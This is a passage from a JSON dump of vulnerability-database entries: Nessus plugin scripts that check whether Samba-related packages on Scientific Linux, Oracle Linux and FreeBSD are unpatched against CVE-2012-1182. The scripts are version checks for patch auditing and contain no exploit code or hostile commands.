script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T02:01:51", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite", "modified": "2020-04-02T00:00:00", "id": "ORACLELINUX_ELSA-2013-0515.NASL", "href": "https://www.tenable.com/plugins/nessus/68752", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : openchange (ELSA-2013-0515)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0515 and \n# Oracle Linux Security Advisory ELSA-2013-0515 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68752);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/09/30 10:58:18\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0515\");\n\n script_name(english:\"Oracle Linux 6 : openchange (ELSA-2013-0515)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0515 :\n\nUpdated openchange packages that fix one security issue, several bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange\nservers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls.\nWith this update, the code has been generated with an updated version\nof PIDL to correct this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version, including support for the rebased samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. (BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003302.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openchange packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-devel / openchange / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T02:01:51", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite", "modified": "2020-04-02T00:00:00", "id": "ORACLELINUX_ELSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/68746", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : samba4 (ELSA-2013-0506)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# Oracle Linux Security Advisory ELSA-2013-0506 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68746);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/30 10:58:18\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"Oracle Linux 6 : samba4 (ELSA-2013-0506)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003301.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T00:12:26", "bulletinFamily": "scanner", "description": "Samba development team reports :\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the ", "modified": "2020-04-02T00:00:00", "id": "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "href": "https://www.tenable.com/plugins/nessus/58671", "published": "2012-04-11T00:00:00", "title": "FreeBSD : samba -- 'root' credential remote code execution (baf37cd2-8351-11e1-894e-00215c6a37bb)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58671);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/10 11:49:43\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"FreeBSD : samba -- 'root' credential remote code execution (baf37cd2-8351-11e1-894e-00215c6a37bb)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba development team reports :\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the 'root' user\nfrom an anonymous connection.\n\nAs this does not require an authenticated connection it is the most\nserious vulnerability possible in a program, and users and vendors are\nencouraged to patch their Samba installations immediately.\"\n );\n # https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42d55cea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba34\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba35\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba36\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba34>3.4.*<3.4.16\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba35>3.5.*<3.5.14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba36>3.6.*<3.6.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T02:01:47", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "modified": "2020-04-02T00:00:00", "id": "ORACLELINUX_ELSA-2012-0478.NASL", "href": "https://www.tenable.com/plugins/nessus/68512", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : samba (ELSA-2012-0478)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2012-0478.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68512);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/30 10:58:17\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n\n script_name(english:\"Oracle Linux 4 : samba (ELSA-2012-0478)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-April/002755.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n 